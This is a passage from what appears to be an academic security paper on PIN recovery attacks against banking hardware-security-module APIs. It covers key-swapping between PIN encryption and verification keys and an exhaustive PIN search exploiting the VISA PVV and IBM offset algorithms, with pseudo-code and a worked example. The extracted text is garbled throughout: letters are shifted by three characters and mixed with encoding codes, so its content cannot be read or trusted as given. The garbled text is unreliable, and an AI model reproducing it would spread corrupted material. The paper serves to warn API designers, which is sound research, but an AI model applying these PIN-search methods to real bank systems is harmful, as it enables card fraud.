6LQFH(cid:3) ZH(cid:3) KDYH(cid:3) QR(cid:3) VHSDUDWLRQ(cid:15)(cid:3) ZH(cid:3) PD\(cid:3) +(cid:20)(cid:22) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +LQWHUFKDQJH(cid:3)WKH(cid:3)XVH(cid:3)RI(cid:3)WKH(cid:3)SLQ(cid:3)HQFU\SWLQJ(cid:3)NH\(cid:3)DQG(cid:3)WKH(cid:3)SLQ(cid:3)YHULILFDWLRQ(cid:3)NH\(cid:17)(cid:3)(cid:3):H(cid:3)ZLVK(cid:3)WR(cid:3)UHFRYHU(cid:3)WKH(cid:3) +3,1(cid:3)(cid:11)3(cid:12)(cid:15)(cid:3)HQFU\SWHG(cid:3)XQGHU(cid:3)VRPH(cid:3)NH\(cid:3)N(cid:17)(cid:3)(cid:3):H(cid:3)KDYH(cid:3)WKH(cid:3)DVVRFLDWHG(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)(3%(cid:3)DQG(cid:3)WKH(cid:3) +HQFU\SWHG(cid:3)NH\(cid:3)N(cid:17)(cid:3)(cid:3) +2XU(cid:3)ILUVW(cid:3)VWHS(cid:15)(cid:3)LV(cid:3)WR(cid:3)WUDQVODWH(cid:3)WKH(cid:3)(3%(cid:3)WR(cid:3)$16,;(cid:28)(cid:17)(cid:27)(cid:3)ZLWK(cid:3)3$1(cid:3) (cid:3)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:27)(cid:27)(cid:27)(cid:27)(cid:27)(cid:17)(cid:3)(cid:3)7KH(cid:3)FOHDU(cid:3)3,1(cid:3)EORFN(cid:3) +LV(cid:3)RI(cid:3)WKH(cid:3)IRUP(cid:3)3%(cid:3) (cid:3)(cid:19)(cid:23)33 3 3 )))))(cid:26)(cid:26)(cid:26)(cid:26)(cid:26)(cid:17)(cid:3)/HW(cid:3)3L (cid:3)3L3L 3L 3L EH(cid:3)D(cid:3)JXHVV(cid:3)IRU(cid:3)3(cid:3)(cid:11)IRU(cid:3)VLPSOLFLW\(cid:3)RI(cid:3) +(cid:20) (cid:21) (cid:22) (cid:23) (cid:20) (cid:21) (cid:22) (cid:23) +QRWDWLRQ(cid:15)(cid:3)ZH(cid:3)KDYH(cid:3)XVHG(cid:3)D(cid:3)(cid:23)(cid:3)GLJLW(cid:3)SLQ(cid:12)(cid:17)(cid:3)(cid:3):H(cid:3)IRUPDW(cid:3)D(cid:3)(cid:20)(cid:25)(cid:3)KH[DGHFLPDO(cid:3)YDOLGDWLRQ(cid:3)GDWD(cid:3)VWULQJ(cid:3)DV(cid:3)9$/(cid:3) (cid:3)(cid:19)(cid:23)(cid:3) +3L3L 3L 3L )))))(cid:26)(cid:26)(cid:26)(cid:26)(cid:26)(cid:17)(cid:3) :H(cid:3)QRZ(cid:3)XVH(cid:3)WKLV(cid:3)YDOLGDWLRQ(cid:3)GDWD(cid:3)DV(cid:3)LQSXW(cid:3)WR(cid:3)VD\(cid:3)WKH(cid:3),%0(cid:3)3LQ(cid:3)*HQHUDWLRQ(cid:3) +(cid:20) (cid:21) (cid:22) (cid:23) +DOJRULWKP(cid:3)XVLQJ(cid:3)WKH(cid:3)HQFU\SWHG(cid:3)NH\(cid:3)N(cid:17)(cid:3)(cid:3)7KH(cid:3)YDOLGDWLRQ(cid:3)VWULQJ(cid:3)LV(cid:3)HQFU\SWHG(cid:3)XQGHU(cid:3)WKH(cid:3)FOHDU(cid:3)YDOXH(cid:3)RI(cid:3)N(cid:15)(cid:3) +GHFLPDOL]HG(cid:3)DQG(cid:3)WKH(cid:3)ILUVW(cid:3)(cid:23)(cid:3)GLJLWV(cid:3)UHWXUQHG(cid:3)DV(cid:3)WKH(cid:3)JHQHUDWHG(cid:3)3,1(cid:3)(cid:11)3 (cid:12)(cid:17)(cid:3)(cid:3):H(cid:3)VLPSO\ FRPSDUH(cid:3)WKH(cid:3)ILUVW(cid:3) +JHQ +(cid:23)(cid:3)GHFLPDOL]HG(cid:3)GLJLWV(cid:3)RI(cid:3)RXU(cid:3)WUDQVODWHG(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)WR(cid:3)3 (cid:17)(cid:3) ,I(cid:3)3L (cid:3)3(cid:15)(cid:3)WKHQ(cid:3)WKH(cid:3)YDOXHV(cid:3)ZLOO(cid:3)EH(cid:3) +JHQ +HTXDO(cid:17)(cid:3)(cid:3):H(cid:3)FDQ(cid:3)H[SHFW(cid:3)PXOWLSOH(cid:3)FROOLVLRQV(cid:3)GXH(cid:3)WR(cid:3)WKH(cid:3)GHFLPDOL]DWLRQ(cid:3)SURFHVV(cid:3)DQG(cid:3)WKH(cid:3)IDFW(cid:3)WKDW(cid:3)ZH(cid:3)RQO\(cid:3) +KDYH(cid:3)(cid:23)(cid:3)GLJLWV(cid:3)WR(cid:3)FRPSDUH(cid:17)(cid:3)(cid:3)+RZHYHU(cid:15)(cid:3)ZH(cid:3)FDQ(cid:3)HOLPLQDWH(cid:3)IDOVH(cid:3)ZLWQHVVHV(cid:3)E\(cid:3)UHSHDWLQJ(cid:3)WKH(cid:3)SURFHVV(cid:3)DQG(cid:3) +PRGLI\LQJ(cid:3) WKH(cid:3) YDOLGDWLRQ(cid:3) GDWD(cid:3) DQG(cid:3) WKH(cid:3) 3$1(cid:3) (cid:11)H(cid:17)J(cid:17)(cid:3) XVH(cid:3) 3$1(cid:3) (cid:3) (cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:27)(cid:27)(cid:27)(cid:27)(cid:26)(cid:3) DQG(cid:3) 9$/(cid:3) (cid:3) +(cid:19)(cid:23)33 3 3 )))))(cid:26)(cid:26)(cid:26)(cid:26)(cid:27)(cid:12)(cid:17)(cid:3)(cid:3)6LPSO\(cid:3)E\(cid:3)LWHUDWLQJ(cid:3)WKURXJK(cid:3)DOO(cid:3)SRVVLEOH(cid:3)YDOXHV(cid:3)RI(cid:3)3L ZH(cid:3)FDQ(cid:3)LGHQWLI\(cid:3)3(cid:17)(cid:3) +(cid:20) (cid:21) (cid:22) (cid:23) +$OWHUQDWLYHO\(cid:15)(cid:3)ZH(cid:3)FDQ(cid:3)EXLOG(cid:3)XS(cid:3)D(cid:3)FRGH(cid:3)ERRN(cid:17)(cid:3)(cid:3) +2QH(cid:3) PD\(cid:3) TXHVWLRQ(cid:3) ZK\(cid:3) ZH(cid:3) GLGQ(cid:10)W(cid:3) XVH(cid:3) D(cid:3) QXOO(cid:3) 3$1(cid:15)(cid:3) DQG(cid:3) IRUPDW(cid:3) WKH(cid:3) YDOLGDWLRQ(cid:3) GDWD(cid:3) DV(cid:3) 9$/(cid:3) (cid:3) +(cid:19)(cid:23)33 3 3 ))))))))))(cid:17)(cid:3)(cid:3)7KH(cid:3)UHDVRQ(cid:3)OLHV(cid:3)LQ(cid:3)WKH(cid:3)IDFW(cid:3)WKDW(cid:3)VRPH(cid:3)$3,(cid:10)V(cid:3)WDNH(cid:3)DV(cid:3)LQSXW(cid:15)(cid:3)HIIHFWLYHO\(cid:3)D(cid:3)(cid:20)(cid:20)(cid:3) +(cid:20) (cid:21) (cid:22) (cid:23) +KH[DGHFLPDO(cid:3)GLJLW(cid:3)YDOLGDWLRQ(cid:3)VWULQJ(cid:15)(cid:3)DQG(cid:3)H[WUDFW(cid:3)WKH(cid:3)ODVW(cid:3)(cid:24)(cid:3)GLJLWV(cid:3)IURP(cid:3)WKH(cid:3)ULJKWPRVW(cid:3)(cid:24)(cid:3)GLJLWV(cid:3)RI(cid:3)WKH(cid:3) +3$1(cid:17)(cid:3)(cid:3)2WKHU(cid:3)$3,•V(cid:3)UHTXLUH(cid:3)WKH(cid:3)(cid:20)(cid:21)WK GLJLW(cid:3)WR(cid:3)VSHFLI\(cid:3)D(cid:3)NH\(cid:3)LQGH[(cid:3)LQ(cid:3)WKH(cid:3)UDQJH(cid:3)(cid:20)(cid:3)WR(cid:3)(cid:25)(cid:17)(cid:3)(cid:3)7KH(cid:3)GHVFULSWLRQ(cid:3) +DERYH(cid:15)(cid:3)ZLOO(cid:3)VDWLVI\(cid:3)WKDW(cid:3)WKH(cid:3)DGGLWLRQ(cid:3)UHTXLUHPHQW(cid:3)WKDW(cid:3)WKH(cid:3)3$1V(cid:3)VXSSOLHG(cid:3)WR(cid:3)JHQHUDWH(cid:3)DQG(cid:3)WUDQVODWH(cid:3) +IXQFWLRQV(cid:3)FRQVLVWV(cid:3)RI(cid:3)GHFLPDO(cid:3)GLJLWV(cid:3) (cid:11)IRU(cid:3)WKH(cid:3)DERYH(cid:3)GHVFULSWLRQ(cid:15)(cid:3)WKH(cid:3)JHQHUDWH(cid:3)FDOO(cid:3)XVHV(cid:3) D(cid:3)3$1(cid:3) (cid:3) +(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:26)(cid:26)(cid:26)(cid:26)(cid:26)(cid:12)(cid:17) +$(cid:3)OLPLWDWLRQ(cid:3)RI(cid:3)WKLV(cid:3)DWWDFN(cid:15)(cid:3)LV(cid:3)WKDW(cid:3)LW(cid:3)UHTXLUHV(cid:3)DFFHVV(cid:3)WR(cid:3)WKH(cid:3)JHQHUDWH(cid:3)IXQFWLRQ(cid:17)(cid:3)(cid:3)+RZHYHU(cid:15)(cid:3)DV(cid:3)PHQWLRQHG(cid:3) +EHIRUH(cid:15)(cid:3)WKLV(cid:3)LV(cid:3)D(cid:3)VHFXULW\(cid:3)ULVN(cid:3)LQ(cid:3)LWVHOI(cid:15)(cid:3)XVXDOO\(cid:3)SURWHFWHG(cid:3)DJDLQVW(cid:3)E\(cid:3)UHVWULFWHG(cid:3)LWV(cid:3)XVDJH(cid:3)WR(cid:3)D(cid:3)VHFXUH(cid:3)RU(cid:3) +DXWKRUL]HG(cid:3)PRGH(cid:15)(cid:3)RU(cid:3)DOWHUQDWLYHO\(cid:15)(cid:3)HQFU\SWLQJ(cid:3)WKH(cid:3)RXWSXW(cid:3)(cid:11)RU(cid:3)UHTXLULQJ(cid:3)HQFU\SWHG(cid:3)LQSXWV(cid:12)(cid:17)(cid:3)(cid:3),I(cid:3)WKH(cid:3)RXWSXW(cid:3) +LV(cid:3)HQFU\SWHG(cid:15)(cid:3)WKHQ(cid:3)ZH(cid:3)PXVW(cid:3)REWDLQ(cid:3)WKH(cid:3)ILUVW(cid:3)(cid:23)(cid:3)GHFLPDOL]HG(cid:3)GLJLWV(cid:3)RI(cid:3)WKH(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)DV(cid:3)DQ(cid:3) +HQFU\SWHG(cid:3)3,1(cid:3)IRU(cid:3)FRPSDULVRQ(cid:17)(cid:3)(cid:3)7KLV(cid:3)LQ(cid:3)LWVHOI(cid:3)LV(cid:3)SHUKDSV(cid:3)QRW(cid:3)D(cid:3)VWUHQXRXV(cid:3)UHTXLUHPHQW(cid:17)(cid:3)(cid:3)+RZHYHU(cid:15)(cid:3)WKHUH(cid:3) +LV(cid:3)D(cid:3)PRUH(cid:3)SRZHUIXO(cid:3)YHUVLRQ(cid:3)RI(cid:3)WKH(cid:3)DWWDFN(cid:15)(cid:3)XVLQJ(cid:3)WKH(cid:3)YHULI\(cid:3)IXQFWLRQ(cid:3)(cid:11)ZKLFK(cid:3)LV(cid:3)XQOLNHO\(cid:3)WR(cid:3)KDYH(cid:3)DFFHVV(cid:3) +FRQWURO(cid:3)UHVWULFWLRQ(cid:12)(cid:17)(cid:3) :H(cid:3)SURFHHG(cid:3)DV(cid:3)EHIRUH(cid:15)(cid:3)JHQHUDWLQJ(cid:3)WKH(cid:3)YDOLGDWLRQ(cid:3)DV(cid:3)EHIRUH(cid:15)(cid:3)EXW(cid:3)VXSSO\LQJ(cid:3)LW(cid:3)WR(cid:3)WKH(cid:3) +YHULILFDWLRQ(cid:3)IXQFWLRQ(cid:3)(cid:11)XVLQJ(cid:3)RIIVHWV(cid:12)(cid:3)DQG(cid:3)VXSSO\LQJ(cid:3)WKH(cid:3)HQFU\SWHG(cid:3)SLQ(cid:3)EORFN(cid:17)(cid:3)(cid:3):H(cid:3)UHTXLUH(cid:3)RQH(cid:3)H[WUD(cid:3)SLHFH(cid:3) +RI(cid:3)LQIRUPDWLRQ(cid:15)(cid:3)QDPHO\(cid:3)WKH(cid:3)RIIVHW(cid:17)(cid:3)(cid:3),I(cid:3)3L (cid:3)3(cid:15)(cid:3)WKH(cid:3)YDOLGDWLRQ(cid:3)VDPH(cid:3)LV(cid:3)LGHQWLFDO(cid:3)WR(cid:3)WKH(cid:3)FOHDU(cid:3)SLQ(cid:3)EORFN(cid:3)DV(cid:3) +EHIRUH(cid:15)(cid:3)WKH(cid:3)LQWHUPHGLDWH(cid:3)3,1(cid:3)ZLOO(cid:3)HTXDO(cid:3)WKH(cid:3)ILUVW(cid:3)(cid:23)(cid:3)GHFLPDOLVHG(cid:3)GLJLWV(cid:3)RI(cid:3)WKH(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3) +(cid:11)ZKLFK(cid:3)LV(cid:3)NQRZQ(cid:12)(cid:17)(cid:3)(cid:3):H(cid:3)GHQRWH(cid:3)WKLV(cid:3)YDOXH(cid:3)E\(cid:3),3,1(cid:17)(cid:3) +7KH(cid:3)RIIVHW(cid:3)LV(cid:3)WKH(cid:3)UHVXOW(cid:3)RI(cid:3)WKH(cid:3)LQWHUPHGLDWH(cid:3)3,1(cid:3)VXEWUDFWHG(cid:3)WKH(cid:3)FOHDU(cid:3)3,1(cid:3)PRGXOR(cid:3)(cid:20)(cid:19)(cid:17)(cid:3)(cid:3)+HQFH(cid:3)WKH(cid:3) +RIIVHW(cid:3)ZLOO(cid:3)HTXDO(cid:3)ZLOO(cid:3)HTXDO(cid:3)WKH(cid:3)VXP(cid:3),3,1(cid:3)DQG(cid:3)3L PRGXOR(cid:3)(cid:20)(cid:19)(cid:17)(cid:3)(cid:3)7KXV(cid:3)IRU(cid:3)HDFK(cid:3)YDOXH(cid:3)3L ZH(cid:3)FDOFXODWH(cid:3)2))6(7(cid:3) +(cid:3)3L (cid:16) ,3,1(cid:3)DQG(cid:3)VXSSO\(cid:3)LW(cid:3)WR(cid:3)WKH(cid:3)YHULILFDWLRQ(cid:3)FDOO(cid:17)(cid:3) ,I(cid:3)3L (cid:3)3(cid:15)(cid:3)WKH(cid:3)FDOO(cid:3)ZLOO(cid:3)SDVV(cid:17)(cid:3)(cid:3))DOVH(cid:3)ZLWQHVVHV(cid:3)FDQ(cid:3)EH(cid:3) +HOLPLQDWHG(cid:3)DV(cid:3)EHIRUH(cid:17) +(cid:27)(cid:17)(cid:21)(cid:17) ([KDXVWLYH(cid:3)3,1(cid:3)VHDUFK(cid:3)EDVHG(cid:3)RQ(cid:3)IDLOXUH(cid:3)WR(cid:3)VHSDUDWH(cid:3)EHWZHHQ(cid:3)3,19(5(cid:3) +NH\V(cid:3)IRU(cid:3)GLIIHUHQW(cid:3)YHULILFDWLRQ(cid:3)DOJRULWKPV +,Q(cid:3)WKLV(cid:3)DWWDFN(cid:15)(cid:3)ZH(cid:3)SOD\(cid:3)WZR(cid:3)GLIIHUHQW(cid:3)YHULILFDWLRQ(cid:3)DOJRULWKPV(cid:3)DJDLQVW(cid:3)HDFK(cid:3)RWKHU(cid:17)(cid:3)(cid:3)7KLV(cid:3)LV(cid:3)D(cid:3)IDVFLQDWLQJ(cid:3) +UHVXOW(cid:3) VLQFH(cid:3) LW(cid:3) VKRZV(cid:3) WKDW(cid:3) WDNLQJ(cid:3) WZR(cid:3) (cid:11)SRWHQWLDOO\(cid:12)(cid:3) LQGLYLGXDOO\(cid:3) VHFXUH(cid:3) YHULILFDWLRQ(cid:3) IXQFWLRQV(cid:15)(cid:3) DQG(cid:3) +DOORZLQJ(cid:3)ERWK(cid:3)LQ(cid:3)D(cid:3)VLQJOH(cid:3)$3,(cid:3)FDQ(cid:3)GHVWUR\(cid:3)LW(cid:10)V(cid:3)VHFXULW\(cid:17)(cid:3)(cid:3),W(cid:3)VHUYHV(cid:3)DV(cid:3)D(cid:3)ZDUQLQJ(cid:3)IRU(cid:3)GHVLJQHUV(cid:3)(cid:11)DQG(cid:3) +LPSOHPHQWHUV(cid:12)(cid:3)RI(cid:3)$3,(cid:10)V(cid:3)DJDLQVW(cid:3)EOLQGO\(cid:3)DGGLQJ(cid:3)IXQFWLRQDOLW\(cid:15)(cid:3)HYHQ(cid:3)WKRXJK(cid:3)WKH(cid:3)IXQFWLRQ(cid:3)PD\(cid:3)EH VHFXUH(cid:3)RQ(cid:3) +LWV(cid:3)RZQ(cid:17)(cid:3)(cid:3),W(cid:3)DOVR(cid:3)VKRZV(cid:3)WKH(cid:3)QHHG(cid:3)IRU(cid:3)H[WUHPHO\(cid:3)ILQH(cid:3)JUDQXODULW\(cid:3)RI(cid:3)VHSDUDWLRQ(cid:3)RI(cid:3)NH\V(cid:3)DVVRFLDWHG(cid:3)ZLWK(cid:3) +GLIIHUHQW(cid:3)IXQFWLRQV(cid:15)(cid:3)HYHQ(cid:3)WKRXJK(cid:3)WKH(cid:3)IXQFWLRQV(cid:3)DUH(cid:3)RI(cid:3)VLPLODU(cid:3)QDWXUH(cid:17) +(cid:20)(cid:23) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +7KH(cid:3)9,6$(cid:3)399(cid:3)DOJRULWKP(cid:3)HQFU\SWV(cid:3)WKH(cid:3)FRQFDWHQDWLRQ(cid:3)RI(cid:3)WKH(cid:3)(cid:20)(cid:20)(cid:3)GLJLW(cid:3)WUDQVIRUPHG(cid:3)VHFXULW\(cid:3)SDUDPHWHU(cid:3) +(cid:11)763(cid:12)(cid:15)(cid:3)D(cid:3)NH\(cid:3)LQGH[(cid:3)(cid:11)D(cid:3)GLJLW(cid:3)LQ(cid:3)WKH(cid:3)UDQJH(cid:3)(cid:20)(cid:3)WR(cid:3)(cid:25)(cid:12)(cid:3)DQG(cid:3)WKH(cid:3)ILUVW(cid:3)(cid:23)(cid:3)GLJLWV(cid:3)RI(cid:3)WKH(cid:3)3,1(cid:3)H[WUDFWHG(cid:3)IURP(cid:3)WKH(cid:3) +HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)(cid:11)L(cid:17)H(cid:17)(cid:3)763(cid:3)__(cid:3).H\(cid:3),QGH[(cid:3)__(cid:3)3,1(cid:12)(cid:17)(cid:3)(cid:3)7KH(cid:3)UHVXOW(cid:3)LV(cid:3)GHFLPDOLVHG(cid:3)LQ(cid:3)D(cid:3)XQLTXH(cid:3)ZD\(cid:17)(cid:3)(cid:3) +6FDQQLQJ(cid:3)IURP(cid:3)OHIW(cid:3)WR(cid:3)ULJKW(cid:15)(cid:3)WKH ILUVW(cid:3)(cid:23)(cid:3)GHFLPDO(cid:3)GLJLWV(cid:3)HQFRXQWHUHG(cid:3)DUH(cid:3)UHWXUQHG(cid:3)DV(cid:3)WKH(cid:3)399(cid:17)(cid:3)(cid:3)6KRXOG(cid:3) +WKHUH(cid:3)EH(cid:3)OHVV(cid:3)WKDQ(cid:3)(cid:23)(cid:3)GLJLWV(cid:15)(cid:3)D(cid:3)VHFRQG(cid:3)VFDQ(cid:3)LV(cid:3)SHUIRUPHG(cid:15)(cid:3)LQ(cid:3)ZKLFK(cid:3)WKH(cid:3)QRQ(cid:3)GHFLPDO(cid:3)GLJLWV(cid:3)DUH(cid:3)FRQYHUWHG(cid:3) +WR(cid:3)GHFLPDO(cid:3)GLJLWV(cid:3)(cid:11)E\(cid:3)VXEWUDFWLRQ(cid:3)PRGXOR(cid:3)(cid:20)(cid:19)(cid:12)(cid:15)(cid:3)DQG(cid:3)WKH(cid:3)ILUVW(cid:3)(cid:23)(cid:3)UHVXOWLQJ(cid:3)GLJLWV(cid:3)UHWXUQHG(cid:3)DV(cid:3)WKH(cid:3)399(cid:17) +7KH(cid:3)SUREDELOLW\(cid:3)WKDW(cid:3)WKH(cid:3)ILUVW(cid:3)(cid:23)(cid:3)GLJLWV(cid:3)DUH(cid:3)LQGHHG(cid:3)DOO(cid:3)GHFLPDO(cid:3)GLJLWV(cid:3)(cid:11)DQG(cid:3)KHQFH(cid:3)IRUP(cid:3)WKH(cid:3)399(cid:12)(cid:3)LV(cid:3) +(cid:23) +§(cid:20)(cid:19)• +(cid:11)¤ ‚ (cid:19)(cid:17)(cid:20)(cid:24)(cid:22)(cid:12)(cid:17)(cid:3)(cid:3)7KXV(cid:3)IRU(cid:3)D(cid:3)JLYHQ(cid:3)NH\(cid:15)(cid:3)E\(cid:3)WU\LQJ(cid:3)(cid:26)(cid:3)GLIIHUHQW(cid:3)YDOXHV(cid:3)IRU(cid:3)WKH(cid:3)763(cid:15)(cid:3)ZH(cid:3)FDQ(cid:3)H[SHFW(cid:3)RQH(cid:3)WR(cid:3) +'(cid:20)(cid:25)„ +H[KLELW(cid:3)WKLV(cid:3)SURSHUW\(cid:17) +&RQVLGHU(cid:3)QRZ(cid:3)WKH(cid:3)UHVXOW(cid:3)RI(cid:3)VXSSO\LQJ(cid:3)WKH(cid:3)YDOXH(cid:3)(cid:11)763(cid:3)__(cid:3).H\(cid:3),QGH[(cid:3)__(cid:3)3,1(cid:12)(cid:3)DV(cid:3)YDOLGDWLRQ(cid:3)GDWD(cid:3)WR(cid:3)WKH(cid:3) +(cid:11),%0(cid:12)(cid:3)RIIVHW(cid:3)DOJRULWKP(cid:3)XQGHU(cid:3)WKH(cid:3)VDPH(cid:3)YHULILFDWLRQ(cid:3)NH\(cid:3)DQG(cid:3)XVLQJ(cid:3)D(cid:3)GHFLPDOL]DWLRQ(cid:3)WDEOH(cid:3)WKDW(cid:3)PDSV(cid:3)Q(cid:3)o +Q(cid:3)PRG(cid:3)(cid:20)(cid:19)(cid:17)(cid:3)(cid:3)7KH(cid:3)ILUVW(cid:3)(cid:23)(cid:3)GLJLWV(cid:3)UHFRYHUHG(cid:3)IURP(cid:3)WKH(cid:3)HQFU\SWLRQ DUH(cid:3)WKH(cid:3)VDPH(cid:3)DV(cid:3)WKH(cid:3)399(cid:15)(cid:3)DQG(cid:3)XQFKDQJHG(cid:3) +E\(cid:3)WKH(cid:3),%0(cid:3)GHFLPDOL]DWLRQ(cid:3)SURFHVV(cid:3)(cid:11)L(cid:17)H(cid:17)(cid:3),3,1(cid:3) (cid:3)399(cid:12)(cid:17)(cid:3)(cid:3)7KHVH(cid:3)(cid:23)(cid:3)GLJLWV(cid:3)DUH(cid:3)VXEWUDFWHG(cid:3)IURP(cid:3)WKH(cid:3)FOHDU(cid:3) +YDOXH(cid:3)RI(cid:3)WKH(cid:3)3,1(cid:3)WR(cid:3)REWDLQ(cid:3)WKH(cid:3)RIIVHW(cid:3)(cid:11)RU(cid:3)2))6(7(cid:3) (cid:3)3,1(cid:3)(cid:16)399(cid:12)(cid:17) +,W(cid:3)LV(cid:3)SRVVLEOH(cid:3)WR(cid:3)XVH(cid:3)WKLV(cid:3)UHODWLRQVKLS(cid:3)WR(cid:3)VHDUFK(cid:3)IRU WKH(cid:3)3,1(cid:17)(cid:3)(cid:3)%\(cid:3)LWHUDWLQJ(cid:3)WKURXJK(cid:3)DOO(cid:3)SRVVLEOH(cid:3)YDOXH(cid:3)IRU(cid:3) +WKH(cid:3)3,1(cid:3)(cid:11)GHQRWHG(cid:3)3L(cid:12)(cid:15)(cid:3)DQG(cid:3)WHVWLQJ(cid:3)ZKHWKHU(cid:3)2))6(7L (cid:3)3L (cid:16) 399(cid:15)(cid:3)VDWLVILHV(cid:3)WKH(cid:3)YHULILFDWLRQ(cid:3)DOJRULWKP(cid:3)ZLWK(cid:3) +YDOLGDWLRQ(cid:3)GDWD(cid:3)(cid:11)763(cid:3)__(cid:3).H\(cid:3),QGH[(cid:3)__(cid:3)3L(cid:12)(cid:17)(cid:3)(cid:3)$V(cid:3)LQGLFDWHG(cid:3)HDUOLHU(cid:15)(cid:3)WKH(cid:3)HQWLUH(cid:3)SURFHVV(cid:3)QHHGV(cid:3)WR(cid:3)EH(cid:3)UHSHDWHG(cid:3) +(cid:26)(cid:3)WLPHV(cid:3)RQ(cid:3)DYHUDJH(cid:3)WR(cid:3)ZLWQHVV(cid:3)WKH(cid:3)WUXH(cid:3)YDOXH(cid:3)IRU(cid:3)WKH(cid:3)3,1(cid:17)(cid:3)(cid:3):H(cid:3)FDQ(cid:3)H[SHFW(cid:3)VRPH(cid:3)IDOVH(cid:3)ZLWQHVVHV(cid:3)IRU(cid:3)WKH(cid:3) +3,1(cid:3)EXW(cid:3)WKHVH(cid:3)FDQ(cid:3)EH(cid:3)HOLPLQDWHG(cid:3)E\(cid:3)LQFUHDVLQJ(cid:3)WKH(cid:3)QXPEHU(cid:3)RI(cid:3)UHSHWLWLRQV(cid:3)(cid:11)VD\(cid:3)WR(cid:3)(cid:20)(cid:23)(cid:3)ZKHQ(cid:3)ZH(cid:3)FDQ(cid:3) +H[SHFW(cid:3)WKH(cid:3)UHDO(cid:3)3,1(cid:3)WR(cid:3)KDYH(cid:3)EHHQ(cid:3)ZLWQHVVHG(cid:3)WZLFH(cid:12)(cid:17) +$OJRULWKP(cid:29) +(cid:20)(cid:17) /RRS(cid:3)L(cid:29)(cid:3)(cid:11)L(cid:3) (cid:3)(cid:20)(cid:17)(cid:17)(cid:26)(cid:12) +(cid:20)(cid:17)(cid:20)(cid:17) 763L(cid:31) (cid:3)L(cid:3)__(cid:3)(cid:20)(cid:3)__(cid:3)(cid:20)(cid:21)(cid:22)(cid:23) +(cid:20)(cid:17)(cid:21)(cid:17) 6HDUFK(cid:3)IRU(cid:3)399L +(cid:20)(cid:17)(cid:22)(cid:17) /RRS(cid:3)M(cid:29)(cid:3)(cid:11)M(cid:3) (cid:3)(cid:19)(cid:17)(cid:17)(cid:17)(cid:28)(cid:28)(cid:28)(cid:28)(cid:12) +(cid:20)(cid:17)(cid:22)(cid:17)(cid:20)(cid:17)3,1M (cid:3)M +(cid:20)(cid:17)(cid:22)(cid:17)(cid:21)(cid:17)2))6(7L(cid:15)(cid:3)M (cid:3)3,1(cid:16)399L +M +(cid:20)(cid:17)(cid:22)(cid:17)(cid:22)(cid:17)9$/(cid:3)’$7$L(cid:15)M (cid:3)L(cid:3)__(cid:3)(cid:20)(cid:3)__(cid:3)M +(cid:20)(cid:17)(cid:22)(cid:17)(cid:23)(cid:17)7HVW(cid:3)LI(cid:3)2))6(7L(cid:15)(cid:3)MYHULILHV(cid:3)WKH(cid:3)3,1(cid:15)(cid:3)LI(cid:3)VR(cid:3)WKHQ(cid:3)M(cid:3)LV(cid:3)D(cid:3)FDQGLGDWH(cid:17) +([DPSOH(cid:29) +3,1(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:20)(cid:21)(cid:22)(cid:23) +9HULILFDWLRQ(cid:3).H\(cid:3)(cid:11).(cid:12)(cid:3)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24) +L(cid:3) (cid:3)(cid:20)(cid:29) +763(cid:20) (cid:20)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:20)(cid:20)(cid:21)(cid:22)(cid:23) +( (cid:11)763(cid:20)(cid:12)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)’(cid:27)(cid:23)(cid:22)(cid:24)(cid:24)()(cid:19)(cid:27)(cid:28)()(cid:21)(cid:28)(cid:22)(cid:3) +(cid:11).(cid:12) +399(cid:20) (cid:27)(cid:23)(cid:22)(cid:24) +:LOO(cid:3)QRW(cid:3)FRUUHFWO\(cid:3)ZLWQHVV(cid:3)WKH(cid:3)3,1(cid:17) +L(cid:3) (cid:3)(cid:21)(cid:29) +763(cid:21) (cid:21)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:20)(cid:20)(cid:21)(cid:22)(cid:23) +( (cid:11)763(cid:21)(cid:12)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:28)’(cid:20)(cid:24)$(cid:20)&(cid:19)%((cid:20)’’(cid:20)(cid:21)(cid:28)(cid:3) +(cid:11).(cid:12) +399(cid:21) (cid:28)(cid:20)(cid:24)(cid:20) +:LOO(cid:3)QRW(cid:3)FRUUHFWO\(cid:3)ZLWQHVV(cid:3)WKH(cid:3)3,1(cid:17) +(cid:20)(cid:24) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +L(cid:3) (cid:3)(cid:22)(cid:29) +399(cid:21) (cid:22)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:20)(cid:20)(cid:21)(cid:22)(cid:23) +( (cid:11)763(cid:22)(cid:12)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:25)(cid:26)(cid:27)(cid:26))$(cid:25)(cid:28)(cid:19)(cid:27)(cid:19)((cid:22)&(cid:28)(cid:22)(cid:3) +(cid:11).(cid:12) +399(cid:22) (cid:25)(cid:26)(cid:27)(cid:26) +:LOO(cid:3)FRUUHFWO\(cid:3)ZLWQHVV(cid:3)WKH(cid:3)3,1(cid:17) +M(cid:3) (cid:3)(cid:20) +9$/B’$7$(cid:22)(cid:15)(cid:20)(cid:3) 